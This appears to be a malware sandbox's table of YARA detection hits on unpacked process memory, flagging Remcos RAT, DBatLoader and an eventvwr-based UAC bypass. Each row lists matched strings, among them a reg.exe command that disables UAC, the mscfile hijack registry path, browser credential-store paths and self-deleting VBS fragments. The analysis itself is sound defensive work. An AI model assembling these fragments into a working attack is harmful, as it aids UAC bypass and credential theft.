9.2.SndVol.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
9.2.SndVol.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
15.2.colorcpl.exe.7090000.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.colorcpl.exe.7090000.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69378:$a1: Remcos restarted by watchdog! 0x698d0:$a3: %02i:%02i:%02i:%03i 0x69c55:$a4: * Remcos v
15.2.colorcpl.exe.7090000.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x6437c:$str_a1: C:\Windows\System32\cmd.exe 0x642f8:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x642f8:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x637a8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63fe0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x633a4:$str_b2: Executing file: 0x644c0:$str_b3: GetDirectListeningPort 0x63da0:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63fc8:$str_b7: \update.vbs 0x633cc:$str_b9: Downloaded file: 0x633b8:$str_b10: Downloading file: 0x6345c:$str_b12: Failed to upload file: 0x64488:$str_b13: StartForward 0x644a8:$str_b14: StopForward 0x63f70:$str_b15: fso.DeleteFile " 0x63f04:$str_b16: On Error Resume Next 0x63fa0:$str_b17: fso.DeleteFolder " 0x6344c:$str_b18: Uploaded file: 0x6340c:$str_b19: Unable to delete: 0x63f38:$str_b20: while fso.FileExists(" 0x638e1:$str_c0: [Firefox StoredLogins not found]
15.2.colorcpl.exe.7090000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63298:$s1: \Classes\mscfile\shell\open\command 0x632f8:$s1: \Classes\mscfile\shell\open\command 0x632e0:$s2: eventvwr.exe
13.2.colorcpl.exe.6d31998.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.colorcpl.exe.6d31998.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
13.2.colorcpl.exe.6d31998.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
13.2.colorcpl.exe.6d31998.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
13.2.colorcpl.exe.6d30000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.colorcpl.exe.6d30000.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x68778:$a1: Remcos restarted by watchdog! 0x68cd0:$a3: %02i:%02i:%02i:%03i 0x69055:$a4: * Remcos v
13.2.colorcpl.exe.6d30000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x6377c:$str_a1: C:\Windows\System32\cmd.exe 0x636f8:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x636f8:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62ba8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x633e0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x627a4:$str_b2: Executing file: 0x638c0:$str_b3: GetDirectListeningPort 0x631a0:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x633c8:$str_b7: \update.vbs 0x627cc:$str_b9: Downloaded file: 0x627b8:$str_b10: Downloading file: 0x6285c:$str_b12: Failed to upload file: 0x63888:$str_b13: StartForward 0x638a8:$str_b14: StopForward 0x63370:$str_b15: fso.DeleteFile " 0x63304:$str_b16: On Error Resume Next 0x633a0:$str_b17: fso.DeleteFolder " 0x6284c:$str_b18: Uploaded file: 0x6280c:$str_b19: Unable to delete: 0x63338:$str_b20: while fso.FileExists(" 0x62ce1:$str_c0: [Firefox StoredLogins not found]
13.2.colorcpl.exe.6d30000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x62698:$s1: \Classes\mscfile\shell\open\command 0x626f8:$s1: \Classes\mscfile\shell\open\command 0x626e0:$s2: eventvwr.exe
15.2.colorcpl.exe.7091998.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.colorcpl.exe.7091998.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x661e0:$a1: Remcos restarted by watchdog! 0x66738:$a3: %02i:%02i:%02i:%03i 0x66abd:$a4: * Remcos v
15.2.colorcpl.exe.7091998.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x611e4:$str_a1: C:\Windows\System32\cmd.exe 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6020c:$str_b2: Executing file: 0x61328:$str_b3: GetDirectListeningPort 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60e30:$str_b7: \update.vbs 0x60234:$str_b9: Downloaded file: 0x60220:$str_b10: Downloading file: 0x602c4:$str_b12: Failed to upload file: 0x612f0:$str_b13: StartForward 0x61310:$str_b14: StopForward 0x60dd8:$str_b15: fso.DeleteFile " 0x60d6c:$str_b16: On Error Resume Next 0x60e08:$str_b17: fso.DeleteFolder " 0x602b4:$str_b18: Uploaded file: 0x60274:$str_b19: Unable to delete: 0x60da0:$str_b20: while fso.FileExists(" 0x60749:$str_c0: [Firefox StoredLogins not found]
15.2.colorcpl.exe.7091998.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60100:$s1: \Classes\mscfile\shell\open\command 0x60160:$s1: \Classes\mscfile\shell\open\command 0x60148:$s2: eventvwr.exe
9.2.SndVol.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
9.2.SndVol.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x691e0:$a1: Remcos restarted by watchdog! 0x69738:$a3: %02i:%02i:%02i:%03i 0x69abd:$a4: * Remcos v
9.2.SndVol.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x641e4:$str_a1: C:\Windows\System32\cmd.exe 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6320c:$str_b2: Executing file: 0x64328:$str_b3: GetDirectListeningPort 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63e30:$str_b7: \update.vbs 0x63234:$str_b9: Downloaded file: 0x63220:$str_b10: Downloading file: 0x632c4:$str_b12: Failed to upload file: 0x642f0:$str_b13: StartForward 0x64310:$str_b14: StopForward 0x63dd8:$str_b15: fso.DeleteFile " 0x63d6c:$str_b16: On Error Resume Next 0x63e08:$str_b17: fso.DeleteFolder " 0x632b4:$str_b18: Uploaded file: 0x63274:$str_b19: Unable to delete: 0x63da0:$str_b20: while fso.FileExists(" 0x63749:$str_c0: [Firefox StoredLogins not found]
9.2.SndVol.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63100:$s1: \Classes\mscfile\shell\open\command 0x63160:$s1: \Classes\mscfile\shell\open\command 0x63148:$s2: eventvwr.exe
13.2.colorcpl.exe.6d31998.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.colorcpl.exe.6d31998.2.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x661e0:$a1: Remcos restarted by watchdog! 0x66738:$a3: %02i:%02i:%02i:%03i 0x66abd:$a4: * Remcos v
13.2.colorcpl.exe.6d31998.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x611e4:$str_a1: C:\Windows\System32\cmd.exe 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6020c:$str_b2: Executing file: 0x61328:$str_b3: GetDirectListeningPort 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60e30:$str_b7: \update.vbs 0x60234:$str_b9: Downloaded file: 0x60220:$str_b10: Downloading file: 0x602c4:$str_b12: Failed to upload file: 0x612f0:$str_b13: StartForward 0x61310:$str_b14: StopForward 0x60dd8:$str_b15: fso.DeleteFile " 0x60d6c:$str_b16: On Error Resume Next 0x60e08:$str_b17: fso.DeleteFolder " 0x602b4:$str_b18: Uploaded file: 0x60274:$str_b19: Unable to delete: 0x60da0:$str_b20: while fso.FileExists(" 0x60749:$str_c0: [Firefox StoredLogins not found]
13.2.colorcpl.exe.6d31998.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60100:$s1: \Classes\mscfile\shell\open\command 0x60160:$s1: \Classes\mscfile\shell\open\command 0x60148:$s2: eventvwr.exe
13.2.colorcpl.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.colorcpl.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x691e0:$a1: Remcos restarted by watchdog! 0x69738:$a3: %02i:%02i:%02i:%03i 0x69abd:$a4: * Remcos v
13.2.colorcpl.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x641e4:$str_a1: C:\Windows\System32\cmd.exe 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6320c:$str_b2: Executing file: 0x64328:$str_b3: GetDirectListeningPort 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63e30:$str_b7: \update.vbs 0x63234:$str_b9: Downloaded file: 0x63220:$str_b10: Downloading file: 0x632c4:$str_b12: Failed to upload file: 0x642f0:$str_b13: StartForward 0x64310:$str_b14: StopForward 0x63dd8:$str_b15: fso.DeleteFile " 0x63d6c:$str_b16: On Error Resume Next 0x63e08:$str_b17: fso.DeleteFolder " 0x632b4:$str_b18: Uploaded file: 0x63274:$str_b19: Unable to delete: 0x63da0:$str_b20: while fso.FileExists(" 0x63749:$str_c0: [Firefox StoredLogins not found]
13.2.colorcpl.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63100:$s1: \Classes\mscfile\shell\open\command 0x63160:$s1: \Classes\mscfile\shell\open\command 0x63148:$s2: eventvwr.exe
0.2.1m181Ru74o.exe.2eb0000.2.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
15.2.colorcpl.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.colorcpl.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x691e0:$a1: Remcos restarted by watchdog! 0x69738:$a3: %02i:%02i:%02i:%03i 0x69abd:$a4: * Remcos v
15.2.colorcpl.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x641e4:$str_a1: C:\Windows\System32\cmd.exe 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6320c:$str_b2: Executing file: 0x64328:$str_b3: GetDirectListeningPort 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63e30:$str_b7: \update.vbs 0x63234:$str_b9: Downloaded file: 0x63220:$str_b10: Downloading file: 0x632c4:$str_b12: Failed to upload file: 0x642f0:$str_b13: StartForward 0x64310:$str_b14: StopForward 0x63dd8:$str_b15: fso.DeleteFile " 0x63d6c:$str_b16: On Error Resume Next 0x63e08:$str_b17: fso.DeleteFolder " 0x632b4:$str_b18: Uploaded file: 0x63274:$str_b19: Unable to delete: 0x63da0:$str_b20: while fso.FileExists(" 0x63749:$str_c0: [Firefox StoredLogins not found]
15.2.colorcpl.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63100:$s1: \Classes\mscfile\shell\open\command 0x63160:$s1: \Classes\mscfile\shell\open\command 0x63148:$s2: eventvwr.exe
9.2.SndVol.exe.48e1998.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
9.2.SndVol.exe.48e1998.2.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x661e0:$a1: Remcos restarted by watchdog! 0x66738:$a3: %02i:%02i:%02i:%03i 0x66abd:$a4: * Remcos v
9.2.SndVol.exe.48e1998.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x611e4:$str_a1: C:\Windows\System32\cmd.exe 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6020c:$str_b2: Executing file: 0x61328:$str_b3: GetDirectListeningPort 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60e30:$str_b7: \update.vbs 0x60234:$str_b9: Downloaded file: 0x60220:$str_b10: Downloading file: 0x602c4:$str_b12: Failed to upload file: 0x612f0:$str_b13: StartForward 0x61310:$str_b14: StopForward 0x60dd8:$str_b15: fso.DeleteFile " 0x60d6c:$str_b16: On Error Resume Next 0x60e08:$str_b17: fso.DeleteFolder " 0x602b4:$str_b18: Uploaded file: 0x60274:$str_b19: Unable to delete: 0x60da0:$str_b20: while fso.FileExists(" 0x60749:$str_c0: [Firefox StoredLogins not found]
9.2.SndVol.exe.48e1998.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60100:$s1: \Classes\mscfile\shell\open\command 0x60160:$s1: \Classes\mscfile\shell\open\command 0x60148:$s2: eventvwr.exe
13.2.colorcpl.exe.6d30000.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.colorcpl.exe.6d30000.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69378:$a1: Remcos restarted by watchdog! 0x698d0:$a3: %02i:%02i:%02i:%03i 0x69c55:$a4: * Remcos v
13.2.colorcpl.exe.6d30000.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x6437c:$str_a1: C:\Windows\System32\cmd.exe 0x642f8:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x642f8:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x637a8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63fe0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x633a4:$str_b2: Executing file: 0x644c0:$str_b3: GetDirectListeningPort 0x63da0:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63fc8:$str_b7: \update.vbs 0x633cc:$str_b9: Downloaded file: 0x633b8:$str_b10: Downloading file: 0x6345c:$str_b12: Failed to upload file: 0x64488:$str_b13: StartForward 0x644a8:$str_b14: StopForward 0x63f70:$str_b15: fso.DeleteFile " 0x63f04:$str_b16: On Error Resume Next 0x63fa0:$str_b17: fso.DeleteFolder " 0x6344c:$str_b18: Uploaded file: 0x6340c:$str_b19: Unable to delete: 0x63f38:$str_b20: while fso.FileExists(" 0x638e1:$str_c0: [Firefox StoredLogins not found]
13.2.colorcpl.exe.6d30000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63298:$s1: \Classes\mscfile\shell\open\command 0x632f8:$s1: \Classes\mscfile\shell\open\command 0x632e0:$s2: eventvwr.exe
13.2.colorcpl.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.colorcpl.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
13.2.colorcpl.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
13.2.colorcpl.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
9.2.SndVol.exe.48e1998.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
9.2.SndVol.exe.48e1998.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
9.2.SndVol.exe.48e1998.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
9.2.SndVol.exe.48e1998.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
15.2.colorcpl.exe.7090000.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.colorcpl.exe.7090000.2.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x68778:$a1: Remcos restarted by watchdog! 0x68cd0:$a3: %02i:%02i:%02i:%03i 0x69055:$a4: * Remcos v
15.2.colorcpl.exe.7090000.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x6377c:$str_a1: C:\Windows\System32\cmd.exe 0x636f8:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x636f8:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62ba8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x633e0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x627a4:$str_b2: Executing file: 0x638c0:$str_b3: GetDirectListeningPort 0x631a0:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x633c8:$str_b7: \update.vbs 0x627cc:$str_b9: Downloaded file: 0x627b8:$str_b10: Downloading file: 0x6285c:$str_b12: Failed to upload file: 0x63888:$str_b13: StartForward 0x638a8:$str_b14: StopForward 0x63370:$str_b15: fso.DeleteFile " 0x63304:$str_b16: On Error Resume Next 0x633a0:$str_b17: fso.DeleteFolder " 0x6284c:$str_b18: Uploaded file: 0x6280c:$str_b19: Unable to delete: 0x63338:$str_b20: while fso.FileExists(" 0x62ce1:$str_c0: [Firefox StoredLogins not found]
15.2.colorcpl.exe.7090000.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x62698:$s1: \Classes\mscfile\shell\open\command 0x626f8:$s1: \Classes\mscfile\shell\open\command 0x626e0:$s2: eventvwr.exe
15.2.colorcpl.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.colorcpl.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
15.2.colorcpl.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
